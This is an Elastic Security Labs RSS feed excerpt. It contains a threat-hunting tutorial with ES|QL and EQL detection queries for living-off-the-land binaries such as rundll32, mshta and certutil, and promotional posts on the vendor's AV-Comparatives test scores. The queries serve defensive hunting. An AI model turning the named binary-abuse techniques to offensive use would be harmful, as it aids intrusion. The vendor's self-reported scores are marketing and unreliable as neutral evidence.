<p>For more information, refer to the <a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-migration">technical documentation</a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image2.png" alt="" /></p>
<ol start="4">
<li>After clicking View Rules, you can edit and install the migrated rules.</li>
</ol>
<h2><strong>How Elastic’s AI features aid SOC teams</strong></h2>
<p>Elastic Security brings generative AI into the SOC with <a href="https://www.elastic.co/docs/solutions/search/rag">retrieval augmented generation (RAG)</a> and open agentic frameworks. Automatic Migration joins the lineup of Elastic Security’s powerful AI features helping SOC teams strengthen defenses across the IT environment:</p>
<ul>
<li><a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-migration">Automatic Migration for Detection Rules</a> complements Elastic’s deep library of prebuilt rules to broaden detection use case coverage.</li>
<li><a href="https://www.elastic.co/blog/automatic-import-ai-data-integration-builder">Automatic Import</a> extends visibility <em>and powers detection rules</em> by onboarding custom data sources in minutes.</li>
<li><a href="https://www.elastic.co/security-labs/ai-driven-security-analytics">Attack Discovery</a> distills the alerts generated by detection rules to pinpoint advancing threats and suggest next steps.</li>
<li><a href="https://www.elastic.co/blog/introducing-elastic-ai-assistant">Elastic AI Assistant</a> guides analysts through investigation and response using natural language.</li>
</ul>
<p>Elastic’s Next Gen SIEM and XDR solution helps analysts detect earlier and respond faster.</p>
<h2>Migrate to Elastic Security today</h2>
<p>The days of being stuck with a legacy SIEM are over. Whether you are migrating from Splunk or QRadar, Elastic is here to ensure your transition is fast, accurate, and powerful. Interested in testing Elastic Security first? <a href="https://www.elastic.co/cloud/cloud-trial-overview">Try it free</a>, or <a href="https://www.elastic.co/splunk-interest?elektra=organic&amp;storm=CLP&amp;rogue=splunkobs-gic">get in touch</a>.</p>
<p>Have feedback? Tell us what you think in the <a href="https://ela.st/slack">Elastic Community Slack channel</a> or on the <a href="https://discuss.elastic.co/c/security/83">Elastic Security forum</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/Security%20Labs%20Images%2010.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[From Hypothesis to Action: Proactive Threat Hunting with Elastic Security]]></title>
            <link>https://www.elastic.co/security-labs/proactive-threat-hunting-with-elastic-security</link>
            <guid>proactive-threat-hunting-with-elastic-security</guid>
            <pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security is designed to enable hypothesis-driven threat hunting at speed and scale. By unifying security telemetry and enabling analytics across clusters, threat hunters can ask complex questions across all their data, correlate signals, and validate hypotheses quickly without manual data stitching.]]></description>
            <content:encoded><![CDATA[<p>When a new threat actor technique emerges — whether from a research blog, an intelligence feed, or breaking news — every threat hunter instinctively shifts into hypothesis mode. Could this be happening in my environment? Are early signals hiding in the noise?</p>
<p>Take the recent TOLLBOOTH research as an example. The moment Elastic Security Labs <a href="https://www.elastic.co/security-labs/tollbooth">published the attack chain</a>, an analyst might begin forming hypotheses based on specific techniques described, such as:</p>
<ul>
<li><em>Have historically frozen or archived IIS server logs shown any anomalies when re-examined with full telemetry?</em></li>
<li><em>Are there signs of credential dumping or privilege escalation attempts on any IIS servers?</em></li>
</ul>
<p>This is the essence of hypothesis-driven hunting: start with a developing threat, and rapidly ask targeted questions. It’s one of the most effective ways to get ahead of emerging attacks, but it demands broad visibility and tools that can keep up with your curiosity.</p>
<p>The reality for many SOC teams, however, falls short. They face data silos, limited search capabilities, and the fatigue of manual correlation.</p>
<p>Elastic Security is designed to remove these barriers by enabling <strong>hypothesis-driven threat hunting at speed and scale</strong>. By unifying security telemetry and enabling analytics across clusters, threat hunters can ask complex questions across all their data, correlate signals, and validate hypotheses quickly without manual data stitching.</p>
<p>This capability is delivered through a set of foundational building blocks that work together:</p>
<ul>
<li>
<p><strong>Agentic workflows</strong> triage alerts, while a <strong>knowledge-grounded AI Assistant</strong> generates validated ES|QL queries, drives remediation, and recommends next steps.</p>
</li>
<li>
<p><strong>Elastic Security Labs</strong> brings continuously updated threat research and adversary insights directly into detections and investigations.</p>
</li>
<li>
<p><strong>Detection rules</strong> provide out-of-the-box coverage aligned to real-world attack techniques and hunting scenarios.</p>
</li>
<li>
<p><strong>Entity analytics</strong> correlates users, hosts, and services, assigns risk scores, and surfaces anomalies to enrich every investigation.</p>
</li>
<li>
<p><strong>Machine learning and anomaly detection</strong> surface deviations from normal behavior and expose unknown or emerging threats.</p>
</li>
<li>
<p><strong>ES|QL, visualizations, and cross-cluster search</strong> enable fast, expressive querying, intuitive analysis, and seamless hunting across distributed environments without blind spots.</p>
</li>
</ul>
<p>Together, these building blocks give security teams the <strong>speed, scale, and analytical depth</strong> needed to move from reactive investigation to confident, proactive threat hunting—testing hypotheses across all of their data within a single, unified Elastic Security platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image5.png" alt="" /></p>
<h2>Into the woods: Navigating a real-world LOLBins hunt</h2>
<p>This section shows how a threat hunt plays out in practice, moving from an empty search bar to a confirmed and contained threat through a real-world scenario focused on Living Off the Land Binaries (LOLBins).</p>
<h3>Build your hypothesis with a RAG-powered AI Assistant</h3>
<p>Your investigation can begin even before writing a single query. You can use Elastic’s retrieval-augmented generation (RAG)–powered AI Assistant to pull in trusted <a href="https://www.elastic.co/docs/solutions/security/ai/ai-assistant-knowledge-base">knowledge sources</a>, such as Elastic Security Labs research, and build the foundation of your hypothesis. You can add any trusted sources as knowledge to ensure the Assistant reflects the data you rely on.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image1.png" alt="Elastic AI Assistant knowledge base entries" /></p>
<p>If you don’t have a specific target yet, you can ask the Assistant, <em>“Based on current trends, what hypothesis should I start my hunt with today?”</em> The Assistant scans the configured knowledge base, which provides relevant context, and generates a primary hypothesis along with supporting reasons and evidence. In this scenario, Elastic Security Labs content has been added to the knowledge base to supply that context.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image9.png" alt="" /></p>
<h3>Sit back while AI Assistant creates your tailored threat hunting query</h3>
<p>Once you accept the LOLBin hypothesis, the AI Assistant generates a precise ES|QL threat hunting query tailored to your environment. Instead of writing complex syntax from scratch, you receive a targeted search designed to surface the specific suspicious behaviors.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image8.png" alt="Elastic AI Assistant-generated ES|QL query to detect Office/Server spawned LOLBins with suspicious patterns" /></p>
<p>To ensure queries are ready to run, the Elastic AI Assistant uses an agentic workflow to generate bespoke ES|QL queries from human-supplied use cases. It draws on your Elastic cluster data to craft accurate, ready-to-run responses and performs automatic validation before returning the final query. This background validation removes the need for manual troubleshooting, delivering a verified, ready-to-use query that can be pulled directly into your investigation timeline from the AI Assistant.</p>
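<p>To make this concrete, here is a sketch of the kind of ES|QL query the Assistant might return for this hypothesis. The index pattern, binary names, and parent processes below are illustrative assumptions, not the exact query generated for any particular environment:</p>
<pre><code>// Hypothetical LOLBin hunt: common LOLBins spawned by Office apps or the IIS worker process
FROM logs-endpoint.events.process-*
| WHERE event.category == "process" AND event.type == "start"
  AND process.name IN ("rundll32.exe", "mshta.exe", "regsvr32.exe", "certutil.exe")
  AND process.parent.name IN ("w3wp.exe", "winword.exe", "excel.exe", "outlook.exe")
// Aggregate to surface unusual host/user/process combinations
| STATS executions = COUNT(*) BY host.name, user.name, process.name, process.parent.name
| SORT executions DESC
| LIMIT 50</code></pre>
<p>Aggregating with <code>STATS ... BY</code> rather than listing raw events keeps the result set small enough to eyeball, while still pointing to the specific host and user pairs worth drilling into.</p>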
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image7.png" alt="Elastic Security Timeline with ES|QL pulled over from the AI-assistant" /></p>
<p>Alternatively, you can link a GitHub repository of Elastic’s <a href="https://github.com/elastic/detection-rules/tree/main/hunting">threat hunting queries</a> to the Assistant’s knowledge base to use existing queries as a baseline for your next steps.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image13.png" alt="Threat hunt queries section within Elastic’s pre-built detection rules GitHub repository" /></p>
<h3>Hunt threats across your entire environment with ES|QL</h3>
<p>If you manage a global environment and need to determine whether this activity is occurring in other clusters, you can expand your hypothesis by asking the AI Assistant to adapt the query for a Cross-Cluster Search (CCS). This enables you to search across multiple clusters in your environment—including frozen and long-term data—without disrupting your investigative workflow.</p>
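<p>Extending a hunt this way is largely a matter of prefixing index patterns with remote cluster names. In the sketch below, the cluster names are hypothetical placeholders, and it assumes those remote clusters are already configured for cross-cluster search:</p>
<pre><code>// Same LOLBin hunt, now spanning the local cluster plus two remote clusters
FROM logs-endpoint.events.process-*, emea-cluster:logs-endpoint.events.process-*, apac-cluster:logs-endpoint.events.process-*
| WHERE process.name == "rundll32.exe"
  AND process.parent.name IN ("w3wp.exe", "winword.exe", "excel.exe")
| KEEP @timestamp, host.name, user.name, process.command_line
| SORT @timestamp DESC
| LIMIT 100</code></pre>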
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image11.png" alt="Updated ES|QL query using cross-cluster search to show Office/Server spawned LOLBins with suspicious patterns in both local and remote clusters" /></p>
<p>Seamlessly transition from the AI Assistant to the timeline view and run the query. This targeted search uncovers a critical finding: an instance of <em>rundll32.exe</em> executing on a Windows server with hostname <em>elastic-defend-endpoint</em> under the <em>gbadmin</em> user account.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image6.png" alt="LOLBin Investigation Timeline results" /></p>
<h3>Add context with analytics and visualizations</h3>
<p>Finding a hit is only step one; now, you must determine if this is an admin performing maintenance or an actual attack. Validating your ideas requires deep analytics across hosts and users. By drilling down into the affected host, you land in the Entity Details.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image10.png" alt="Host Entity flyout" /></p>
<p>Here, you’re not just seeing a hostname. You’re seeing a consolidated view of the host’s risk score, the specific alerts contributing to that score, and the asset’s criticality—all in one place. By bringing together detection signals, behavioral anomalies, and asset importance, Elastic’s entity risk scoring helps analysts quickly understand why an asset is risky, how urgent the threat is, and where to focus first. This unified context reduces investigation time, minimizes guesswork, and enables confident prioritization in high-volume environments.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image14.png" alt="Entity details, risk score, and associated alerts for the affected host" /></p>
<h3>Confirm the anomaly with machine learning</h3>
<p>When you examine the risk score, the supporting evidence is displayed alongside it. You can see the specific alerts contributing to the elevated risk score, including a mix of medium-severity alerts and a Machine Learning (ML) alert such as <em><strong>“Unusual Windows Path Activity”</strong></em>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image16.png" alt="Machine learning anomaly alert" /></p>
<p>Because ML is uniquely suited to detecting subtle deviations that static rules often miss, seeing an ML alert contributing to the risk score helps validate that this activity isn’t just noise—it points to a meaningful behavioral anomaly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image2.png" alt="‘Unusual Windows Path Activity’ alert flyout" /></p>
<p>The event details immediately visualize the process lineage, revealing the critical evidence right in the panel. These insights transform your hypothesis from plausible to provable.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image12.png" alt="Visual event analyzer with rundll32.exe flyout" /></p>
<h3>Take action: From insight to response</h3>
<p>After validating your hypothesis by uncovering suspicious activity, the immediate next step is response. Elastic Security lets responders act directly from their investigations without switching platforms.</p>
<p>Once a compromised host is confirmed, you can take action from the console by isolating the host to prevent lateral movement or terminating the malicious process tree uncovered in your <strong>LOLBin hunt</strong>. This seamless transition from investigation to response enables rapid containment using the same tools and context.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image4.png" alt="Response console for isolated host, elastic-defend-endpoint" /></p>
<h3>Operationalize queries and automate hunting</h3>
<p>To automate future hunts and eliminate manual verification of recurring patterns, you can convert a hunting query directly into a fully operational detection rule with a single click, or create rules that alert on specific behaviors, anomalies, or term values appearing for the first time.</p>
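<p>When a hunting query becomes a scheduled ES|QL detection rule, a common pattern is to trim it to the fields needed for alerting; for non-aggregating queries, Elastic’s documentation recommends including document metadata so generated alerts can be tied back to source events and deduplicated. A sketch, with the same illustrative index pattern and filters as before:</p>
<pre><code>// Hunt query reshaped for an ES|QL detection rule (non-aggregating form)
FROM logs-endpoint.events.process-* METADATA _id, _version, _index
| WHERE process.name IN ("rundll32.exe", "regsvr32.exe")
  AND process.parent.name == "w3wp.exe"
| KEEP _id, _version, _index, @timestamp, host.name, user.name, process.command_line</code></pre>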
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image15.png" alt="Detection rule creation with ES|QL in Elastic Security" /></p>
<p>In enterprise environments, a LOLBin hunt can quickly generate a high volume of alerts. This is where agentic <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery"><strong>Attack Discovery</strong></a> makes a big difference. Its primary purpose is to help you triage efficiently by automatically correlating signals and highlighting the activity that requires immediate attention.</p>
<p>You can also group and tag hunting-related alerts and run Attack Discovery specifically on those sets to uncover meaningful patterns. This flexibility makes Attack Discovery valuable not only for automated alert triage, but also for advanced, hypothesis-driven threat hunting workflows.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image3.png" alt="Running Attack Discovery on a curated group of LOLBin hunting alerts" /></p>
<h3>Bonus: Automate with Elastic Agent Builder</h3>
<p>Imagine building a <strong>LOLBin Hunter custom agent</strong>—purpose-built to hunt for LOLBin activity across your security data. Using <a href="https://www.elastic.co/docs/solutions/search/agent-builder/get-started"><strong>Elastic Agent Builder</strong></a>, you can create this agent powered by an LLM and equipped with tools such as the ES|QL queries used in your manual workflow.</p>
<p>Once configured, you can interact with your security data using natural language, and the agent will reason through your request, select the most relevant tools, and take action. For example, you could ask: <em>“Show me LOLBin activity that triggered machine learning anomalies and summarize the affected hosts and their risk scores.”</em></p>
<h3>Stay ahead of emerging attacks with Elastic Security</h3>
<p>Hypothesis-driven threat hunting is critical for staying ahead of modern attacks, but it can be complex and time-consuming without the right tools. Elastic Security combines AI-assisted investigation, ES|QL search, contextual analytics, machine learning, and integrated response to make every stage simpler and faster.</p>
<p>From the moment a new threat emerges to the point of actionable response, Elastic empowers analysts to uncover hidden signals, validate their hypotheses, and act decisively—turning raw data into intelligence and intelligence into action.</p>
<p>Interested in learning more about Elastic Security? <a href="https://www.elastic.co/events">Browse our webinars, events, and more</a> or <a href="https://www.elastic.co/start">get started with your free trial</a> today.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image0.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Elastic excels in AV-Comparatives EPR Test 2025: A closer look]]></title>
            <link>https://www.elastic.co/security-labs/elastic-av-comparatives-epr-test-2025</link>
            <guid>elastic-av-comparatives-epr-test-2025</guid>
            <pubDate>Mon, 22 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic shares results of the 2025 AV Comparatives EPR test]]></description>
<content:encoded><![CDATA[<p>In a threat landscape defined by sophisticated, multistage attacks, enterprises demand endpoint security solutions that not only detect threats but also actively prevent them and enable rapid response when the unexpected occurs. Elastic Security demonstrated exceptional performance in a recent AV-Comparatives evaluation, achieving a remarkable 99.3% detection rate. This figure was consistent across both Active Response and Passive Response methods in the <a href="https://www.av-comparatives.org/tests/endpoint-prevention-response-epr-test-2025/?utm_source=blog&amp;utm_medium=referral&amp;utm_campaign=av-comparatives-epr-test-2025-gc">Endpoint Prevention and Response (EPR) Test</a>, highlighting the versatility and robustness of Elastic Security’s capabilities and its strong protection across different attack vectors.</p>
<h2><strong>What is the EPR Test?</strong></h2>
<p>AV-Comparatives’ EPR Test is one of the most rigorous evaluations in the industry. It simulates complex, realistic attack scenarios that traverse the full kill chain, including:</p>
<ul>
<li>Endpoint compromise and foothold (e.g., initial access, execution, and persistence)</li>
<li>Internal propagation (e.g., privilege escalation, lateral movement, and credential theft)</li>
<li>Asset breach (e.g., exfiltration, command and control, and impact)</li>
</ul>
<p>The EPR Test replicates APT-like multistage attacks rather than relying on synthetic malware samples. It evaluates <a href="https://www.elastic.co/blog/elastic-extended-security">endpoint prevention and response solutions</a> against the MITRE ATT&amp;CK® framework, covering:</p>
<p><strong>Phase 1: Endpoint Compromise and Foothold</strong></p>
<ul>
<li><strong>Initial Access, Execution, and Persistence</strong>
<ul>
<li>Replication through removable media</li>
<li>Malicious documents/scripts</li>
<li>Registry modifications</li>
</ul>
</li>
</ul>
<p><strong>Phase 2: Internal Propagation</strong></p>
<ul>
<li><strong>Privilege Escalation, Lateral Movement, and Credential Access</strong>
<ul>
<li>Scheduled tasks/launch daemons</li>
<li>Unsecure credentials</li>
<li>Exploitation of remote services</li>
</ul>
</li>
</ul>
<p><strong>Phase 3: Asset Breach</strong></p>
<ul>
<li><strong>Collection, Command and Control, and Exfiltration</strong>
<ul>
<li>Data encoding</li>
<li>Input and screen capture</li>
<li>Application layer protocol</li>
</ul>
</li>
</ul>
<p>All participants are scored on two vectors:</p>
<ul>
<li><strong>Active Response:</strong> The product blocks the attack automatically.</li>
<li><strong>Passive Response:</strong> The product detects and alerts on the activity, providing actionable data for analysts.</li>
</ul>
<p>Additionally, the test quantifies:</p>
<ul>
<li><strong>Operational Accuracy Costs</strong> (false positives, admin overhead)</li>
<li><strong>Workflow Delay Costs</strong> (productivity impact)</li>
<li><strong>Total Cost of Ownership (TCO)</strong> for a <strong>5,000-endpoint/5-year deployment</strong></li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image4.png" alt="AV-Comparatives Enterprise CyberRisk Quadrant™" /></p>
<h2><strong>AV-Comparatives’ Certified EPR Product Award</strong></h2>
<p>In order to get a meaningful comparison between all participants, AV-Comparatives developed the Enterprise CyberRisk Quadrant, which takes into consideration all of the aspects described above. Elastic Security achieved <em>Certified</em> status, reflecting a high level of performance in all key areas and confirming that the product meets stringent evaluation standards. As Andreas Clementi, CEO and founder of AV-Comparatives, stated:<br />
“Elastic achieved strong results in AV-Comparatives’ 2025 Endpoint Prevention and Response Test. The product demonstrated consistent performance across both Active and Passive Response methods, highlighting its ability to provide reliable protection against a broad range of attack vectors.”</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image1.png" alt="av comparative certified EPR 2025 illustration" /></p>
<h2><strong>How Elastic Security performed on the test</strong></h2>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image3.png" alt="" /></p>
<table>
<thead>
<tr>
<th align="left">Metric</th>
<th align="left">Elastic Security results</th>
<th align="left">Interpretation</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Active Response (Prevention)</td>
<td align="left">99.3%</td>
<td align="left">Automated blocking effective across most stages of attack chains</td>
</tr>
<tr>
<td align="left">Passive Response (Detection)</td>
<td align="left">99.3%</td>
<td align="left">Alerts enriched with MITRE ATT&amp;CK mappings, aiding triage and forensic workflows</td>
</tr>
<tr>
<td align="left">Operational Accuracy Cost</td>
<td align="left">Low</td>
<td align="left">Minimal impact due to detection tuning</td>
</tr>
<tr>
<td align="left">Workflow Delay Cost</td>
<td align="left">None</td>
<td align="left">No user workflow disruption</td>
</tr>
</tbody>
</table>
<h2><strong>Why these results matter</strong></h2>
<p><strong>1. Prevention is front and center:</strong><br />
A 99.3% active response rate means Elastic Security was able to stop threats <em>before</em> they could run wild in almost all test cases. This includes interrupting attacks in early phases like execution, persistence, or initial foothold — highly valuable since earlier detection often means lower damage.</p>
<p><strong>2. Low noise, minimal disruption:</strong><br />
False positives (mistakenly flagged benign behavior) and workflow delays are often silent risks; they may not make headlines, but they erode confidence, reduce productivity, and increase costs. Elastic Security’s low operational accuracy cost and zero workflow delay in this test show that strong security doesn’t need to come at the expense of usability.</p>
<p><strong>3. Balanced total cost of ownership (TCO):</strong><br />
The test factors in not just purchase and licensing costs, but also the cost of responding to incidents, staffing, false positives, and potential breach fallout over time. Elastic Security’s strong showing suggests that its solution offers good value in the long term.</p>
<p><strong>4. Holistic protection:</strong><br />
Because the test spans multiple stages of an attack, it rewards vendors who do more than just detect malware signatures. Elastic Security’s performance across initial compromise, propagation, and asset breach phases indicates depth — protection at different layers, good detection capabilities, and the ability to give admins useful data for remediation.</p>
<h2><strong>Conclusions</strong></h2>
<p>Elastic Security’s results in the AV-Comparatives EPR Test 2025 reaffirm its role as a leading endpoint prevention, detection, and response solution. With near-perfect prevention rates, minimal false positives, no workflow delays, and favorable total cost projections, it demonstrates that enterprise security need not force a trade-off between robust protection and operational efficiency.</p>
<h2><strong>One more resource before you go</strong></h2>
<p>Elastic Security isn’t just getting noticed in the analyst community. Cybersecurity practitioners like John Hammond, who recently took <a href="https://youtu.be/tw-NNqzgohk">a hands-on look at Elastic Security</a> are taking notice, too. If you’re interested in just the key highlights from the interview, we summarize them all in <a href="https://www.elastic.co/blog/raw-data-real-time-defense-john-hammond"><em>From raw data to real-time defense: A conversation with John Hammond</em></a>.</p>
<h2><strong>Get started with Elastic Security</strong></h2>
<p>Join the growing number of businesses that trust Elastic Security to protect their organization against attacks. Experience the peace of mind that comes with knowing that your endpoints <em>and organization as a whole</em> are secure against the latest threats. Start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>, and discover the difference that our protection can make. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more.<br />
<em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image2.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security scores 100% in AV-Comparatives Business Security Test]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-av-comparatives-business-security-test-2025</link>
            <guid>elastic-security-av-comparatives-business-security-test-2025</guid>
            <pubDate>Mon, 09 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security nailed it with a perfect score of 100% in the most recent AV-Comparatives Business Security Test.]]></description>
            <content:encoded><![CDATA[<p>We’re thrilled to share that Elastic Security achieved a score of 100% in the recent <a href="https://www.av-comparatives.org/tests/business-security-test-march-april-2025-factsheet/">AV-Comparatives Business Security Test</a>.</p>
<h2>Why the AV-Comparatives Business Security Test matters</h2>
<p>AV-Comparatives is a highly respected organization that conducts rigorous, independent testing specifically for business endpoint security solutions. Unlike consumer antivirus tests, AV-Comparatives evaluations go beyond basic malware detection. The Real-World Protection Test simulates real-world attack scenarios, including malicious websites, in a multipronged approach that evaluates a product’s ability to safeguard businesses from contemporary threats. Earning top honors in AV-Comparatives' Business Security Test signifies a solution's effectiveness in protecting organizations.</p>
<p>The test simulates 220 distinct and complex attack scenarios that replicate the tactics and techniques of contemporary threat actors. The Malware Protection Test assesses a security product’s ability to protect a system against infection by malicious files before, during, or after execution. The evaluation utilized a substantial dataset of 1,018 unique and recently identified malware samples, representing the current threat landscape.</p>
<p>Elastic Security earned perfect scores in both critical categories, demonstrating its robust capabilities to accurately identify and prevent a wide spectrum of sophisticated threats, including both targeted attacks and prevalent malware.</p>
<h2>Highlights from Elastic Security’s performance</h2>
<p><strong>Ranked first of the tested products:</strong> The following business products were tested under Microsoft Windows 11 64-bit:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image1.png" alt="ranked first tested products" /></p>
<p><strong>Real-World Protection Test:</strong> Elastic Security excelled in the Real-World Protection Test, achieving 100% coverage and demonstrating exceptional defense against current cyber attacks. This demonstrates how Elastic gives your business the necessary protection to effectively combat the newest threats, reducing the likelihood of data breaches and operational interruptions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image4.png" alt="real world protection test" /></p>
<p><strong>100% protection in Malware Protection Test:</strong> Elastic Security was the sole participant among 17 vendors to achieve a perfect 100% score in both the Real-World Protection Test and the Malware Protection Test. Our advanced threat detection engine is exceptionally effective at identifying and mitigating malware, proactively combating the increasingly sophisticated malware environment. This perfect score across both critical evaluation criteria highlights not only the efficacy of Elastic Security’s solutions in practical, real-world scenarios but also its comprehensive capabilities in identifying and neutralizing a broad spectrum of malicious software.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image2.png" alt="malware protection test" /></p>
<p>Our <a href="https://www.elastic.co/blog/elastic-av-comparatives-business-security-test">consistently excellent results</a> demonstrate our ongoing commitment to delivering dependable protection for businesses of all scales. Elastic Security is a proven solution for safeguarding your organization's data against threats.</p>
<h2>Performance is key to security</h2>
<p>Elastic Security recognizes that effective cybersecurity requires more than just identifying and stopping malicious activity. Advanced cybersecurity demands seamless integration with daily operations for sophisticated security and business efficiency. Comprehensive security capabilities, such as advanced threat detection, proactive ransomware defense, and sophisticated malware analysis, form the bedrock of a strong security posture. However, their true value is diminished if they lead to system performance degradation. Slow, resource-intensive security solutions can frustrate users, impede productivity, and ultimately undermine the very security they aim to provide.</p>
<p>At Elastic Security, performance is not a secondary consideration but a fundamental pillar of our security philosophy and product design. We are committed to delivering world-class security without the performance overhead that can disrupt workflows. Our engineering efforts focus on optimizing every aspect of our platform to minimize CPU and memory consumption.</p>
<h2><strong>EDR stops at the endpoint, XDR doesn’t</strong></h2>
<p>Today’s threat landscape is complex and dynamic, with attacks originating from various sources and targeting diverse environments. By correlating information from endpoints, networks, cloud workloads, and more, extended detection and response (XDR) offers a holistic view of the security posture, protecting against increasingly complex threats. The shift from endpoint detection and response (EDR) to XDR is a critical evolution in security operations, offering more robust, efficient, and effective defense mechanisms.</p>
<p><a href="https://www.elastic.co/security/xdr">XDR security from Elastic</a> is designed to protect data across the entire organization — regardless of where it resides. Elastic Security helps organizations improve detection rates, reduce response times, and mitigate overall risk by unifying data types and providing limitless ingestion, analysis, and protection.</p>
<ul>
<li><strong>Extended visibility:</strong> Elastic provides a unified view of your security landscape, encompassing endpoints, networks, and cloud environments. This comprehensive perspective empowers analysts to see the big picture and connect the dots between potential threats. With hundreds of integrations and the AI-driven Automatic Import feature at the ready, your team can seamlessly onboard all types of data from various sources, expanding your visibility across the organization.</li>
<li><strong>XDR detection capabilities:</strong> Elastic Securityʼs AI-driven security analytics correlates data across all sources to uncover sophisticated threats that often evade detection by individual security solutions. Our vast library, with hundreds of prebuilt rules mapped to the MITRE ATT&amp;CK® matrix, combined with proprietary research and detection content from Elastic Security Labs, helps you separate the signal from the noise so you can focus on actual threats. Elastic Security also provides more than 75 machine learning detection rules to automatically detect anomalies across numerous security domains like suspicious user or host activity.</li>
<li><strong>Native and third-party responses:</strong> Analysts often face an overwhelming volume of alerts, making it challenging to act on legitimate threats quickly. To address this, Elastic Security offers both native and third-party response actions to stop attackers in their tracks.</li>
</ul>
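<p>As a hypothetical illustration of the style of prebuilt detection logic described above (this is a sketch, not an actual rule from Elastic’s library), an EQL query might flag a Microsoft Office application spawning a script interpreter — a common post-phishing execution pattern in the MITRE ATT&amp;CK® matrix:</p>
<pre><code>// Hypothetical example: Office application spawning a script interpreter
process where event.type == "start" and
  process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
  process.name : ("powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
</code></pre>
<p>Correlating such endpoint events with network and cloud telemetry is what lets XDR surface the broader attack chain rather than an isolated alert.</p>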
<p>We believe XDR should be accessible to every organization, regardless of budget constraints. Thatʼs why our XDR solution is included without any hidden costs or “optional extras.” Our comprehensive visibility goes beyond endpoint telemetry, eliminating the need for additional licenses to unlock full XDR capabilities — all included in the Elastic Security solution. With no per-host or per-agent charges, you have the flexibility to provide coverage where and when you need it.</p>
<p><strong>Read more:</strong> <a href="https://www.elastic.co/blog/elastic-extended-security">You thought Elastic only did SIEM? Think again!</a></p>
<h2>Get started with Elastic Security</h2>
<p>Join the growing number of businesses that trust Elastic Security to protect their organization against attacks. Experience the peace of mind that comes with knowing your endpoints — and organization as a whole — are secure against the latest threats. Start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a> and discover the difference that our protection can make. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more and get started.</p>
<p>For more detailed results and to see the full report, visit the <a href="https://www.av-comparatives.org/tests/business-security-test-march-april-2025-factsheet/">AV-Comparatives Business Security Test 2025 website</a>.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image3.jpg" length="0" type="image/jpeg"/>
        </item>
    </channel>
</rss>